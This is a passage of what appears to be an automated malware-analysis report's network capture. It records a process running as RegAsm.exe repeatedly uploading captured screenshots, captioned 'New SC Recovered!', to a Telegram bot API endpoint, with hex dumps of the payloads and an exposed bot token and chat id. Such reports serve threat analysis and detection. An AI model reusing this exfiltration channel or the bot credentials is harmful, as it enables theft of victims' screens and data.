                                                2024-05-24 05:44:06 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 61 31 61 35 30 66 36 65 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 61 31 61 35 30 66 36 65 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 34 2f 32 30 32 34 20 30 35 3a 32 39 3a 34 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcaba1a50f6e18Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcaba1a50f6e18Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/24/2024 05:29:45User
                                                2024-05-24 05:44:06 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:06 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:06 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:06 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:06 UTC1168OUTData Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:44:06 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 61 31 61 35 30 66 36 65 31 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcaba1a50f6e18--
                                                2024-05-24 05:44:07 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:07 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.749717149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:44:09 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcae7fd2a8c765
                                                Host: api.telegram.org
                                                Content-Length: 67229
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:10 UTC25INHTTP/1.1 100 Continue
                                                2024-05-24 05:44:10 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 37 66 64 32 61 38 63 37 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 37 66 64 32 61 38 63 37 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 37 2f 32 30 32 34 20 32 30 3a 35 35 3a 31 38 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcae7fd2a8c765Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcae7fd2a8c765Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/27/2024 20:55:18User
                                                2024-05-24 05:44:10 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:10 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:10 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:10 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:10 UTC1643OUTData Raw: 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 09 28 a8 fc f8 7f e7 aa 7f df 42 8f 3e 1f f9 ea 9f f7 d0 a0 02 7f f8 f7 93 fd d3 fc ab e7 9a fa 0e 69 a2 30 48 04 88 49 53 fc 43 d2 be 7c ab 89 9c c2 b7 34 cf 12 4f 67 63 f6 0b 9b 58 2f ec f3 b9 61 b8
                                                Data Ascii: >(B>(B>(B>(B>(B>(B>(B>(B>(B>(B>i0HISC|4OgcX/a
                                                2024-05-24 05:44:10 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 65 37 66 64 32 61 38 63 37 36 35 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcae7fd2a8c765--
                                                2024-05-24 05:44:10 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:10 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.749718149.154.167.2204436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-24 05:44:15 UTC262OUTPOST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcb1ecef588748
                                                Host: api.telegram.org
                                                Content-Length: 67317
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:15 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 65 63 65 66 35 38 38 37 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 31 65 63 65 66 35 38 38 37 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 30 31 2f 32 30 32 34 20 30 35 3a 31 33 3a 35 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcb1ecef588748Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcb1ecef588748Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/01/2024 05:13:55User
                                                2024-05-24 05:44:15 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:15 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:15 UTC16355OUTData Raw: 44 7e ad f9 51 f6 98 fd 5b f2 a2 c0 4d 45 41 f6 98 fd 5b f2 a3 ed 31 ff 00 b5 f9 51 60 27 a2 a0 fb 4c 5e ad f9 51 f6 98 bd 5b f2 a2 cc 09 e8 cd 41 f6 98 bf da fc a8 fb 54 5e ad f9 53 b0 c9 e8 a8 3e d5 17 fb 5f 95 1f 6a 8b fd af ca 8b 01 33 ff 00 c7 bc df ee 7f 51 55 6c ff 00 d6 9f a5 39 ee 90 c4 ea b9 cb 0c 72 2a 1b 79 56 27 25 b3 8c 50 93 b3 15 8b d4 b5 07 da a2 f5 6f ca 8f b5 45 ea 7f 2a 2c 32 6a 5a 83 ed 50 fa b7 e5 47 da a1 f5 3f 95 01 62 7a 4a 87 ed 70 fa 9f ca 8f b5 c3 ea 7f 2a 2c 16 27 a2 a0 fb 54 3f de 6f ca 8f b5 43 ea df 95 16 02 7a 2a 0f b5 c3 ea df 95 1f 6b 87 d5 bf 2a 2c c2 c4 f4 54 1f 6b 83 d5 bf 2a 3e d7 07 f7 9b f2 a5 66 16 27 a2 a0 fb 5c 1f de 6f ca 8f b5 c1 fd e6 fc a8 b3 0b 13 d2 d4 1f 6b b7 fe f3 7e 54 7d ae 0e ee df 95 16 63 b1 35 2d
                                                Data Ascii: D~Q[MEA[1Q`'L^Q[AT^S>_j3QUl9r*yV'%PoE*,2jZPG?bzJp*,'T?oCz*k*,Tk*>f'\ok~T}c5-
                                                2024-05-24 05:44:15 UTC15447OUTData Raw: 52 51 45 00 14 51 45 03 12 8a 28 a0 02 8a 29 28 00 a2 8a 28 18 51 45 14 00 94 51 45 03 0a 4a 28 a6 01 45 14 94 0c 28 a2 8a 00 29 29 69 33 40 c2 8a 4c 9a 4a 02 c2 e4 52 66 8a 4a 06 14 94 b4 94 0c 29 29 68 a0 62 51 45 14 00 51 45 25 03 0a 4a 5a 4a 00 28 a2 8a 06 25 14 51 40 09 45 14 50 30 a4 a0 d1 40 c2 92 96 92 80 0a 4a 28 a0 61 49 45 14 0c 29 29 69 0d 00 14 94 b4 94 0c 28 a2 92 81 85 25 2d 06 80 12 8a 28 a0 62 51 45 14 00 52 51 45 03 12 8a 28 a6 30 a2 8a 3a 52 01 28 a3 de 8a 06 25 14 b4 94 00 52 7e 14 b4 94 0c 28 a2 92 98 c2 8c 51 45 20 0a 4a 5a 4a 06 14 9e f4 bc d2 53 00 eb 47 3e 94 51 48 62 51 4b 49 f8 53 00 a4 fa 52 fd 28 a0 67 53 45 14 54 1e 08 51 56 f4 eb 23 7d 3b 44 1f 61 54 dd 9c 67 3c 8f f1 ab 9f d8 84 1c 1b 8c 1f f7 3f fa f5 c9 5b 1b 42 84 b9 6a
                                                Data Ascii: RQEQE()((QEQEJ(E())i3@LJRfJ))hbQEQE%JZJ(%Q@EP0@J(aIE))i(%-(bQERQE(0:R(%R~(QE JZJSG>QHbQKISR(gSETQV#};DaTg<?[Bj
                                                2024-05-24 05:44:15 UTC1731OUTData Raw: 43 a3 89 48 01 8a 48 c9 bc 0e 9b 80 20 37 e3 9a 9f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 89 ac 2d 5a 16 88 c5 94 69 7c e2 37 1f bf bb 76 7a fa 8a b3 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51 f9 f0 ff 00 cf 54 ff 00 be 85 1e 7c 3f f3 d5 3f ef a1 40 12 51 51
                                                Data Ascii: CHH 7z(}-Zi|7vzQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQT|??@QQ
